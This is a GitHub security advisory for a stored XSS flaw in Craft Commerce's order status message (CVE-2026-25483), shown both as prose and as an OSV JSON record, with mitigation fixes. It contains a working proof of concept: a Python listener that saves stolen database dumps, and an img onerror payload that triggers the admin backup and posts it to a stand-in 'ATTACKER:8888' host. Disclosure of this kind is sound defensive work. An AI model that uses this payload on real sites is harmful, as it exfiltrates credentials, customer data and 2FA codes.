GHSA-8478-RMJG-MJJ5
Vulnerability from github – Published: 2026-02-02 22:43 – Updated: 2026-02-03 21:39Summary
A stored XSS vulnerability exists in Craft Commerce’s Order Status History Message. The message is rendered using the |md filter, which permits raw HTML, enabling malicious script execution. If a user has database backup utility permissions (which do not require an elevated session), an attacker can exfiltrate the entire database, including all user credentials, customer PII, order history, and 2FA recovery codes.
Users are recommended to update to the patched 5.5.2 release to mitigate the issue.
Proof of Concept
Required Permissions
- General
- Access the control panel
- Access Craft Commerce
- Access to the database backup utility
- Craft Commerce
- Manage orders
- Edit orders
Attacker Server Setup
To reproduce this attack, you need a server to receive the exfiltrated database.
1. Save the Python script as receiver.py on your attacker machine.
2. Run it: python3 receiver.py -- Change the port if needed.
#!/usr/bin/env python3
"""
Usage: python3 receiver.py
"""
from http.server import HTTPServer, BaseHTTPRequestHandler
import cgi, os
from datetime import datetime
class Handler(BaseHTTPRequestHandler):
def do_OPTIONS(self):
self.send_response(200)
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Access-Control-Allow-Methods', 'POST')
self.end_headers()
def do_POST(self):
self.send_response(200)
self.send_header('Access-Control-Allow-Origin', '*')
self.end_headers()
content_type = self.headers.get('Content-Type', '')
if 'multipart/form-data' in content_type:
form = cgi.FieldStorage(
fp=self.rfile, headers=self.headers,
environ={'REQUEST_METHOD': 'POST', 'CONTENT_TYPE': content_type}
)
if 'db' in form:
filename = f"exfil_{datetime.now().strftime('%Y%m%d_%H%M%S')}.sql.zip"
with open(filename, 'wb') as f:
f.write(form['db'].file.read())
print(f"[+] DB saved: {filename} ({os.path.getsize(filename):,} bytes)")
self.wfile.write(b"OK")
if __name__ == '__main__':
print("[*] Listening on http://0.0.0.0:8888") # change the port if needed
HTTPServer(('0.0.0.0', 8888), Handler).serve_forever()
Steps to Reproduce
- Log in to the admin panel
- Navigate to Commerce → Orders
- Create a new order, enter a customer email, and mark the order as completed. The Order should be saved now; if not, save it.
- Edit the order
- Change the order status, a new text field (Status Message) will appear once the status is changed
- Make sure you have multiple order statuses; if not, create one from (/admin/commerce/settings/orderstatuses)
- In the Status Message field, enter the XSS payload below
- Save/Update the order
- Log out & log in again with an admin account
- Visit the order page (/admin/commerce/orders/{Order_ID})
- XSS executes → Full database backup is triggered and exfiltrated
- Go back to the attacker’s server and notice a zipped file containing the full exfiltrated database.
XSS Payload (DB Exfiltration)
Note: Replace ATTACKER:8888 with your listener server.
<img src=x onerror="fetch('/index.php?p=admin/actions/utilities/db-backup-perform-action',{method:'POST',headers:{'Content-Type':'application/x-www-form-urlencoded'},body:'action=utilities/db-backup-perform-action&CRAFT_CSRF_TOKEN='+Craft.csrfTokenValue+'&downloadBackup=1'}).then(r=>r.blob()).then(b=>{let f=new FormData;f.append('db',b,'backup.sql');fetch('http://ATTACKER:8888/',{method:'POST',body:f})})">
Technical Details (Vulnerable Code)
File: vendor/craftcms/commerce/src/templates/orders/_history.twig
Sink: {{ orderHistory.message | md }}
Root Cause: The |md Twig filter (Markdown) processes the message but does not sanitize HTML tags.
Impact
The exfiltrated database backup includes, but is not limited to: - Usernames, emails, and password hashes. - Customer PII: Names, addresses, and complete order history. - Transaction records, customer profiles, and coupon codes. - GraphQL tokens. - 2FA recovery codes. - Potentially, payment gateway secrets (if stored directly instead of using environment variables).
Note: This XSS can also be leveraged for the same attacks described in previous reports, including privilege escalation and forced password changes.
Mitigation
Sanitize the message before rendering:
{{ orderHistory.message | md | purify }}
Or escape HTML before Markdown processing:
{{ orderHistory.message | e | md }}
Additionally, requiring an elevated session for the DB Backup utility would increase the difficulty of exploitation, although it would not prevent the attack, as it might occur while an active elevated session is in place.
Resources:
https://github.com/craftcms/commerce/commit/4665a47c0961aee311a42af2ff94a7c470f0ad8c
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 5.5.1"
},
"package": {
"ecosystem": "Packagist",
"name": "craftcms/commerce"
},
"ranges": [
{
"events": [
{
"introduced": "5.0.0"
},
{
"fixed": "5.5.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.10.0"
},
"package": {
"ecosystem": "Packagist",
"name": "craftcms/commerce"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0-RC1"
},
{
"fixed": "4.10.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-25483"
],
"database_specific": {
"cwe_ids": [
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-02T22:43:00Z",
"nvd_published_at": "2026-02-03T19:16:25Z",
"severity": "MODERATE"
},
"details": "## Summary\n\nA stored XSS vulnerability exists in Craft Commerce\u2019s Order Status History Message. The message is rendered using the `|md` filter, which permits raw HTML, enabling malicious script execution. If a user has database backup utility permissions (which do not require an elevated session), an attacker can exfiltrate the entire database, including all user credentials, customer PII, order history, and 2FA recovery codes.\n\nUsers are recommended to update to the patched 5.5.2 release to mitigate the issue.\n\n---\n## Proof of Concept\n\n### Required Permissions\n\n- General\n\t- Access the control panel\n\t- Access Craft Commerce\n\t- Access to the database backup utility\n- Craft Commerce\n\t- Manage orders\n\t- Edit orders\n\n### Attacker Server Setup\n\nTo reproduce this attack, you need a server to receive the exfiltrated database.\n1. Save the Python script as `receiver.py` on your attacker machine.\n2. Run it: `python3 receiver.py` -- Change the port if needed.\n\n\u003cdetails\u003e\n\n\u003csummary\u003eServer Python Script\u003c/summary\u003e\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nUsage: python3 receiver.py\n\"\"\"\n\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nimport cgi, os\nfrom datetime import datetime\n\nclass Handler(BaseHTTPRequestHandler):\n def do_OPTIONS(self):\n self.send_response(200)\n self.send_header(\u0027Access-Control-Allow-Origin\u0027, \u0027*\u0027)\n self.send_header(\u0027Access-Control-Allow-Methods\u0027, \u0027POST\u0027)\n self.end_headers()\n\n def do_POST(self):\n self.send_response(200)\n self.send_header(\u0027Access-Control-Allow-Origin\u0027, \u0027*\u0027)\n self.end_headers()\n \n content_type = self.headers.get(\u0027Content-Type\u0027, \u0027\u0027)\n if \u0027multipart/form-data\u0027 in content_type:\n form = cgi.FieldStorage(\n fp=self.rfile, headers=self.headers,\n environ={\u0027REQUEST_METHOD\u0027: \u0027POST\u0027, \u0027CONTENT_TYPE\u0027: content_type}\n )\n if \u0027db\u0027 in form:\n filename = f\"exfil_{datetime.now().strftime(\u0027%Y%m%d_%H%M%S\u0027)}.sql.zip\"\n with open(filename, \u0027wb\u0027) as f:\n f.write(form[\u0027db\u0027].file.read())\n print(f\"[+] DB saved: {filename} ({os.path.getsize(filename):,} bytes)\")\n \n self.wfile.write(b\"OK\")\n\nif __name__ == \u0027__main__\u0027:\n print(\"[*] Listening on http://0.0.0.0:8888\") # change the port if needed\n HTTPServer((\u00270.0.0.0\u0027, 8888), Handler).serve_forever()\n```\n\n\u003c/details\u003e\n\n### Steps to Reproduce\n\n1. Log in to the admin panel\n2. Navigate to **Commerce** \u2192 **Orders**\n3. Create a new order, enter a customer email, and mark the order as completed. The Order should be saved now; if not, save it.\n4. Edit the order\n5. Change the order status, a new text field (Status Message) will appear once the status is changed\n - Make sure you have multiple order statuses; if not, create one from (/admin/commerce/settings/orderstatuses)\n6. In the **Status Message** field, enter the XSS payload below\n7. Save/Update the order\n8. Log out \u0026 log in again with an admin account\n9. Visit the order page (/admin/commerce/orders/{Order_ID})\n10. XSS executes \u2192 Full database backup is triggered and exfiltrated\n11. Go back to the attacker\u2019s server and notice a zipped file containing the full exfiltrated database.\n\n### XSS Payload (DB Exfiltration)\n\n**Note:** Replace `ATTACKER:8888` with your listener server.\n```html\n\u003cimg src=x onerror=\"fetch(\u0027/index.php?p=admin/actions/utilities/db-backup-perform-action\u0027,{method:\u0027POST\u0027,headers:{\u0027Content-Type\u0027:\u0027application/x-www-form-urlencoded\u0027},body:\u0027action=utilities/db-backup-perform-action\u0026CRAFT_CSRF_TOKEN=\u0027+Craft.csrfTokenValue+\u0027\u0026downloadBackup=1\u0027}).then(r=\u003er.blob()).then(b=\u003e{let f=new FormData;f.append(\u0027db\u0027,b,\u0027backup.sql\u0027);fetch(\u0027http://ATTACKER:8888/\u0027,{method:\u0027POST\u0027,body:f})})\"\u003e\n```\n\n---\n## Technical Details (Vulnerable Code)\n\n**File:** `vendor/craftcms/commerce/src/templates/orders/_history.twig`\n**Sink:** `{{ orderHistory.message | md }}`\n**Root Cause:** The `|md` Twig filter (Markdown) processes the message but does not sanitize HTML tags.\n\n---\n## Impact\n\nThe exfiltrated database backup includes, but is not limited to:\n- Usernames, emails, and password hashes.\n- Customer PII: Names, addresses, and complete order history.\n- Transaction records, customer profiles, and coupon codes.\n- GraphQL tokens.\n- 2FA recovery codes.\n- Potentially, payment gateway secrets (if stored directly instead of using environment variables).\n\n**Note:** This XSS can also be leveraged for the same attacks described in previous reports, including privilege escalation and forced password changes.\n\n---\n## Mitigation\n\nSanitize the message before rendering:\n```twig\n{{ orderHistory.message | md | purify }}\n```\n\nOr escape HTML before Markdown processing:\n```twig\n{{ orderHistory.message | e | md }}\n```\n\nAdditionally, requiring an elevated session for the DB Backup utility would increase the difficulty of exploitation, although it would not prevent the attack, as it might occur while an active elevated session is in place.\n\n## Resources:\n\nhttps://github.com/craftcms/commerce/commit/4665a47c0961aee311a42af2ff94a7c470f0ad8c",
"id": "GHSA-8478-rmjg-mjj5",
"modified": "2026-02-03T21:39:59Z",
"published": "2026-02-02T22:43:00Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/craftcms/commerce/security/advisories/GHSA-8478-rmjg-mjj5"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25483"
},
{
"type": "WEB",
"url": "https://github.com/craftcms/commerce/commit/4665a47c0961aee311a42af2ff94a7c470f0ad8c"
},
{
"type": "PACKAGE",
"url": "https://github.com/craftcms/commerce"
},
{
"type": "WEB",
"url": "https://github.com/craftcms/commerce/releases/tag/4.10.1"
},
{
"type": "WEB",
"url": "https://github.com/craftcms/commerce/releases/tag/5.5.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:H/SI:L/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Craft Commerce has Stored XSS via Order Status Message with potential database exfiltration"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.